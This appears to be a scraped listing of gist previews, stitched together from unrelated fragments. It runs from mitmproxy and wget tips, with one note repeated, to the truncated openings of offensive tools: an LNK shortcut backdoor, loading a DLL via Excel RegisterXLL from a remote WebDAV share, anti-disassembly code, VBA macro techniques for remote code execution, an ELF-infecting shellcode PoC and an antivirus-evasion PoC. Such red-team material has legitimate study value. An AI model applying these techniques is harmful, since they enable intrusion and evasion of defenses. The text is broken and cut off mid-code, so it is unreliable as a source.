mitmproxy is an excellent console app written in Python.
It is easy to use on Linux and OS X.
Use brew install mitmproxy
to install it on OS X.
mitmproxy is an excellent console app written in Python.
It is easy to use on Linux and OS X.
Use brew install mitmproxy
to install it on OS X.
Download Google Drive files with WGET | |
Example Google Drive download link: | |
https://docs.google.com/open?id=[ID] | |
To download the file with WGET you need to use this link: | |
https://googledrive.com/host/[ID] | |
Example WGET command: |
function Set-LNKBackdoor { | |
<# | |
.SYNOPSIS | |
Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by | |
-ScriptBlock or -Command. | |
Author: @harmj0y | |
License: BSD 3-Clause | |
Required Dependencies: None |
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
/* | |
* gcc -m32 thwart_IDA.c -o thwart_IDA | |
*/ | |
#include <stdio.h> | |
/* throws off esp analysis to thwart hexrays | |
Credit: https://github.com/RPISEC/MBE |
This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
Write-Warning "This script will not function with administrative privileges. Please run as a normal user." | |
Break | |
} | |
$outfile = "acltestfile" | |
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";") | |
Foreach ($path in $paths) { | |
# This prints a table of ACLs | |
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
;;; | |
;;; Copyright (C), zznop, brandonkmiller@protonmail.com | |
;;; | |
;;; This software may be modified and distributed under the terms | |
;;; of the MIT license. See the LICENSE file for details. | |
;;; | |
;;; DESCRIPTION | |
;;; | |
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF |
#!/usr/bin/env python3 | |
from __future__ import print_function | |
import frida | |
import sys | |
import json | |
import time | |
def on_message(message, payload): | |
if(message['type'] == 'send'): |
/* | |
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes. | |
*/ | |
#include <stdio.h> | |
#include <tchar.h> | |
#include <windows.h> | |
#include "Commctrl.h" | |
#include <string> |